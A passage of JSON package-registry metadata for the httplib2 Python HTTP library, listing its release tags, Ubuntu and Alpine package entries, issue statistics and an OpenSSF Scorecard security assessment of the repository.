ps://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-25T00:50:05.059Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/python-httplib2?arch=source\u0026distro=ubuntu-24.04","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/python-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/python-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/python-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-24T13:45:52.705Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":4,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":4,"past_year_avg_comments_per_issue":3.0,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/python-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/python-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/python-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/python-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/python-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/python-httplib2/codemeta","maintainers":[],"registry":{"name":"ubuntu-24.04","url":"https://launchpad.net/ubuntu/noble","ecosystem":"ubuntu","default":true,"packages_count":37306,"maintainers_count":0,"namespaces_count":4,"keywords_count":1697,"github":"ubuntu","metadata":{"codename":"noble","funded_packages_count":1245},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:45.928Z","updated_at":"2026-08-25T05:06:49.291Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/namespaces"}},{"id":13009005,"name":"py3-httplib2-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-httplib2","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2025-09-05T04:34:46.000Z","latest_release_published_at":"2025-09-05T04:34:46.000Z","latest_release_number":"0.30.0-r0","last_synced_at":"2026-04-01T09:01:52.152Z","created_at":"2026-01-31T00:50:09.851Z","updated_at":"2026-08-22T13:24:45.577Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.23/community/x86_64/py3-httplib2-pyc","install_command":"apk add py3-httplib2-pyc","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/ht